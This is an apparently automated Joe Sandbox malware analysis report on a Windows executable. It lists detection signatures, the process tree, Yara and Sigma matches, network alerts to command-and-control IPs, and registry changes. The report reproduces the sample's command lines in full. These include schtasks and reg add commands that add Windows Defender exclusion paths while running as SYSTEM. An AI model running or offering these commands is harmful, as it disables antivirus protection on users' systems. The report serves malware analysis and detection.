Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
183643586-388657435.07.exe

Overview

General Information

Sample name:183643586-388657435.07.exe
Analysis ID:1590469
MD5:edae96658a4b8891aa1f35bab79b1179
SHA1:851f9ef8de5b497ba16fa12a1b02534c821fda64
SHA256:d45ab0d352d221a239e019d3f04f5e85029a023ef80c8e616b91ea490bf232cd
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds extensions / path to Windows Defender exclusion list (Registry)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Opens the same file many times (likely Sandbox evasion)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to delay execution (extensive OutputDebugStringW loop)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • 183643586-388657435.07.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\183643586-388657435.07.exe" MD5: EDAE96658A4B8891AA1F35BAB79B1179)
  • ieiUC1.exe (PID: 2280 cmdline: C:\Users\user\Documents\ieiUC1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • ieiUC1.exe (PID: 1836 cmdline: C:\Users\user\Documents\ieiUC1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • ieiUC1.exe (PID: 1016 cmdline: C:\Users\user\Documents\ieiUC1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 7240 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 5800 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 5804 cmdline: SCHTASKS /Run /TN "Task1" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 2452 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 1556 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8060 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 3636 cmdline: SCHTASKS /Run /TN "Task1" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 2980 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 2392 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7968 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 5352 cmdline: SCHTASKS /Run /TN "Task1" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 2992 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 5360 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 5452 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 7680 cmdline: SCHTASKS /Run /TN "Task1" MD5: 796B784E98008854C27F4B18D287BA30)
      • schtasks.exe (PID: 5680 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 796B784E98008854C27F4B18D287BA30)
    • DXESuT.exe (PID: 2236 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 2024 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 7764 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • reg.exe (PID: 7828 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 7336 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • reg.exe (PID: 7860 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6776 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • reg.exe (PID: 4636 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1460 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • reg.exe (PID: 576 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • DXESuT.exe (PID: 8008 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 5880 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 5152 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DXESuT.exe (PID: 5328 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DXESuT.exe (PID: 5268 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 7500 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DXESuT.exe (PID: 5704 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 3124 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DXESuT.exe (PID: 7880 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 808 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DXESuT.exe (PID: 3640 cmdline: "C:\Program Files (x86)\DXESuT\DXESuT.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 4624 cmdline: "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • dTuXOGtw.exe (PID: 6456 cmdline: MD5: 337AEF8FF9C35846732FC8CBF416C0A7)
  • DXESuT.exe (PID: 7272 cmdline: MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • I0JA3xg.exe (PID: 5328 cmdline: MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.2.ieiUC1.exe.2930000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
3.2.ieiUC1.exe.29d0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\ieiUC1.exe, ParentImage: C:\Users\user\Documents\ieiUC1.exe, ParentProcessId: 1016, ParentProcessName: ieiUC1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7240, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\ieiUC1.exe, ParentImage: C:\Users\user\Documents\ieiUC1.exe, ParentProcessId: 1016, ParentProcessName: ieiUC1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7240, ProcessName: cmd.exe
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7764, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 7828, ProcessName: reg.exe
Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T05:10:59.145726+010020283713Unknown Traffic192.168.11.204975339.103.20.17443TCP
2025-01-14T05:11:00.733114+010020283713Unknown Traffic192.168.11.204975539.103.20.17443TCP
2025-01-14T05:11:03.139401+010020283713Unknown Traffic192.168.11.204975739.103.20.17443TCP
2025-01-14T05:11:04.922689+010020283713Unknown Traffic192.168.11.204975839.103.20.17443TCP
2025-01-14T05:11:06.263351+010020283713Unknown Traffic192.168.11.204975939.103.20.17443TCP
2025-01-14T05:11:15.360937+010020283713Unknown Traffic192.168.11.204976039.103.20.17443TCP
2025-01-14T05:11:18.741160+010020283713Unknown Traffic192.168.11.204976139.103.20.17443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T05:12:54.993140+010028529011Malware Command and Control Activity Detected192.168.11.20497698.217.78.2428917TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\DXESuT\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\6IAs1K1O\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Multi AV Scanner detection for submitted file
Source: 183643586-388657435.07.exeVirustotal: Detection: 9%Perma Link
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\DXESuT\tbcore3U.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\6IAs1K1O\tbcore3U.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.11.20:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 183643586-388657435.07.exe
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: ieiUC1.exe, 00000004.00000003.36961144933.000000000414E000.00000004.00000020.00020000.00000000.sdmp, DXESuT.exe, 00000025.00000000.37225883763.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000026.00000000.37242814871.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000027.00000000.37248637577.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002A.00000002.37264141184.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002A.00000000.37258425529.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 0000002B.00000002.37265326143.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002B.00000000.37258903639.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002C.00000002.37350014406.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002C.00000000.37343099366.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 0000002D.00000002.37354481992.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002D.00000000.37348753553.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 0000002E.00000000.37932804362.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002E.00000002.37938252879.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 0000002F.00000002.37944573090.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002F.00000000.37938712745.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000030.00000000.38532895099.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000030.00000002.38538741676.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000031.00000002.38544788128.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000031.00000000.38538784323.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000032.00000002.39138734072.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000032.00000000.39132893557.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000033.00000000.39138776659.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000033.00000002.39145147808.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000035.00000000.39732867447.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000035.00000002.39738651568.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000036.00000002.39745875126.00000000000F8000.00000002.00000001.01000000.0000000C.s
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: ieiUC1.exe, 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000002.00000000.36311353866.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000003.00000002.36328287726.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000003.00000000.36320160389.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000004.00000000.36741313443.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
